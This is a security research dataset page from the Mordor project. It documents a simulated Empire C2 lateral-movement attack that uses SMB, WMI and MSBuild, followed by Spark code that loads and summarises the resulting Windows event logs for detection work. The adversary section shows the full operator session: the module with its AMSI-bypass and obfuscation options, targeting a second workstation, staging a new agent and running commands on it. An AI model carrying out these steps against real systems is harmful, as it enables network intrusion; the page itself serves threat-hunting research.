Empire Invoke Execute MSBuild

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/20

Tactics

[‘TA0002’, ‘TA0008’]

Techniques

[‘T1047’]

Tags

[‘WMI IWbemServices ExecMethod’, ‘SMB CreateRequest’]

Dataset Description

This dataset represents an adversary remotely creating a file (.xml) via SMB and executing it remotetly via WMI and msbuild. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author

Name

Link

Simulation Plan

Environment

Tool Type

Module

Mordor shire

C2

invoke_executemsbuild

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            
AWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         2228   5/0.0    2020-09-20 21:33:05  http            

(Empire: agents) > interact AWTK7BX5  
(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_executemsbuild
(Empire: powershell/lateral_movement/invoke_executemsbuild) > info

              Name: Invoke-ExecuteMSBuild
            Module: powershell/lateral_movement/invoke_executemsbuild
        NeedsAdmin: False
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None

Authors:
  @xorrior

Description:
  This module utilizes WMI and MSBuild to compile and execute
  an xml file containing an Empire launcher

Comments:
  Inspired by @subtee
  http://subt0x10.blogspot.com/2016/09/bypassing-application-
  whitelisting.html

Options:

  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        AWTK7BX5                  Agent to run module from.               
  Listener         False                                 Listener to use.                        
  Command          False                                 Custom command to run.                  
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  CredID           False                                 CredID from the store to use.           
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      
  ComputerName     True                                  Host to target                          
  UserName         False                                 UserName if executing with credentials  
  Password         False                                 Password if executing with credentials  
  FilePath         False                                 Desired location to copy the xml file on
                                                        the target                              
  DriveLetter      False                                 Drive letter to use when mounting the   
                                                        share locally                           

(Empire: powershell/lateral_movement/invoke_executemsbuild) > set Listener http
(Empire: powershell/lateral_movement/invoke_executemsbuild) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_executemsbuild) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT
[*] Agent AWTK7BX5 tasked with task ID 1
[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_executemsbuild
(Empire: powershell/lateral_movement/invoke_executemsbuild) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6
[*] New agent U63RL1XZ checked in
[+] Initial agent U63RL1XZ from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to U63RL1XZ at 172.18.39.6

__GENUS          : 2
__CLASS          : __PARAMETERS
__SUPERCLASS     : 
__DYNASTY        : __PARAMETERS
__RELPATH        : 
__PROPERTY_COUNT : 2
__DERIVATION     : {}
__SERVER         : 
__NAMESPACE      : 
__PATH           : 
ProcessId        : 6952
ReturnValue      : 0
PSComputerName   : 

(Empire: powershell/lateral_movement/invoke_executemsbuild) > 
(Empire: powershell/lateral_movement/invoke_executemsbuild) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http
AWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         2228   5/0.0    2020-09-20 21:39:34  http            
U63RL1XZ ps 172.18.39.6     WORKSTATION6      *THESHIRE\pgustavo      powershell         3008   5/0.0    2020-09-20 21:39:35  http            

(Empire: agents) > interact U63RL1XZ
(Empire: U63RL1XZ) > shell whoami
[*] Tasked U63RL1XZ to run TASK_SHELL
[*] Agent U63RL1XZ tasked with task ID 1
(Empire: U63RL1XZ) > 
theshire\pgustavo

..Command execution completed.

(Empire: U63RL1XZ) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_msbuild_dcerpc_wmi_smb.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |725  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |537  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |516  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |472  |
|WORKSTATION6.theshire.local|security                                |4658   |308  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |197  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |177  |
|WORKSTATION6               |Windows PowerShell                      |800    |176  |
|WORKSTATION6.theshire.local|security                                |4656   |164  |
|WORKSTATION6.theshire.local|security                                |4690   |154  |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |150  |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |132  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |98   |
|WORKSTATION6.theshire.local|security                                |4663   |97   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |68   |
|WORKSTATION5.theshire.local|Security                                |5158   |47   |
|MORDORDC.theshire.local    |Security                                |5156   |44   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |11     |42   |
|MORDORDC.theshire.local    |Security                                |5158   |39   |
|WORKSTATION6.theshire.local|security                                |5158   |33   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows